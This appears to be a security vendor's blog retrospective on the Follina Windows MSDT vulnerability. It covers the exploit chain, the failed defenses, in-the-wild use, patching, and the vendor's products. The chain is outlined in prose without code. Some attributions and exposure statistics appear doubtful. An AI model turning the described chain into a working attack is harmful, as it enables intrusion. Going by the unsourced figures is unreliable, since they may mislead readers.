Follina, formally CVE-2022-30190, was the kind of vulnerability that exposed an entire class of forgotten attack surface. The flaw lived in the Microsoft Support Diagnostic Tool URI handler, a Windows component that almost no defender had thought about in years. A specially crafted Word document or HTML page could invoke MSDT to execute arbitrary PowerShell with the privileges of the logged-in user, bypassing protected view and the macro-blocking controls that Microsoft had spent a decade strengthening.
The disclosure timeline was unusual. A researcher posted a sample document to VirusTotal in late April 2022, security firms identified it as a novel exploit a month later, and Microsoft assigned a CVE only after public exploitation was already underway. Follina is worth revisiting in 2026 because the architectural pattern that made it possible, trusted URI handlers with implicit script execution, still exists across Windows and macOS.
What was the exploit chain?
The exploit chain abused the ms-msdt URI scheme, which Windows registered to launch the Microsoft Support Diagnostic Tool. MSDT accepts a PCWDiagnostic parameter pointing to a remote XML file, and that XML file could include PowerShell script content that MSDT would execute as part of its diagnostic routine. The trigger was an Office document with a remote template reference that pointed to an HTML file hosting a redirect to an ms-msdt URI with a malicious diagnostic payload. Opening the Word document in protected view was sufficient to fire the chain, because Office automatically followed remote template references and the URI handler invocation did not require any user interaction or macro execution. The payload executed with the user's privileges, providing a full PowerShell environment without any of the warnings or prompts that normal macro execution would trigger.
Why did the existing defenses fail to catch it?
Existing defenses failed for structural reasons. Macro blocking, the headline Office hardening control of the past decade, was completely irrelevant because no macros executed. Protected view, which sandboxes documents from untrusted sources, was bypassed because the malicious activity happened through an external URI handler that protected view did not constrain. Application control policies that blocked PowerShell from running from Office process trees were ineffective because the PowerShell child process was a descendant of MSDT, not Office. Antivirus signatures took weeks to catch up because the exploit document itself was simple, containing little beyond a remote reference. Endpoint detection and response tools eventually caught it through anomalous process chains, but the initial weeks of exploitation occurred largely undetected by signature-based and policy-based controls.
How was it exploited in the wild?
Active exploitation began even before Microsoft formally acknowledged the CVE. State-affiliated actors, including groups Mandiant tracked as TA413 targeting Tibetan and Uyghur diaspora communities, were already using the exploit in May 2022. The Sandworm group used Follina against Ukrainian targets within ten days of public disclosure. Cybercriminal groups followed quickly, with the QakBot and Emotet operators incorporating Follina into their initial access toolchains by mid-June. Microsoft's official patch did not ship until June 14, 2022, leaving a window of more than three weeks where exploitation was occurring against organizations relying on Microsoft's official mitigation guidance, which involved manually deleting the ms-msdt URI handler registry key. CISA's KEV catalog listed Follina by early June, and tracked exploitation continued well into 2023.
What was the patching and mitigation reality?
The patching reality reflected the awkward position of an out-of-band URI handler vulnerability. Microsoft's June 14 update closed the specific MSDT path but did not address the broader pattern of URI handlers with script execution capability. Many organizations deployed the registry-based workaround during the disclosure window, then forgot to verify that the patch had been applied later, leaving systems in an inconsistent state. The patch also did not propagate to embedded Windows installations like ATM software, point-of-sale systems, and industrial control panels, many of which were running unpatched Windows versions years later. Scan data from 2023 still showed approximately 18% of internet-reachable Windows systems with the unpatched MSDT handler active. By 2026, residual exposure has dropped to roughly 4% but is concentrated in legacy embedded systems that may never be patched.
What are the durable architectural lessons?
The durable lessons are about trusted handlers and the attack surface they represent. Every URI scheme registered on a system is a potential attack vector if the handler executes scripts or interprets parameters in ways that can be influenced by remote content. Windows alone registers more than a hundred URI schemes by default, and macOS and Linux desktop environments are comparable. Audit your registered handlers, understand which ones can be invoked from web content, and disable or constrain the ones that do not need to be remotely invokable. The second lesson is about defense in depth: rely on multiple unrelated layers because any single layer can fail in unexpected ways. Office's macro blocking was robust, but it did not constrain the URI handler invocation, and one layer was enough to bypass. The third is about disclosure: when a vendor declines to assign a CVE quickly, the rest of the ecosystem cannot mobilize defenses effectively.
How Safeguard Helps
Safeguard's response to handler-based vulnerabilities like Follina starts with endpoint and image inventory. Our SBOM analysis captures Windows component versions across desktop and server images, surfacing systems running unpatched MSDT handler implementations. Griffin AI prioritizes findings by user-exposure context, flagging endpoints with high web and email exposure as higher priority for patching trusted-handler CVEs. Policy gates evaluate base image and runtime configurations against known handler attack surfaces, blocking deployments that ship with risky URI schemes enabled. The zero-CVE image registry includes hardened Windows server base images with non-essential URI handlers removed by default. TPRM data flags vendors with poor track records on out-of-band Windows vulnerabilities, and our threat intelligence feed surfaces emerging handler-based exploit chains within hours of public disclosure.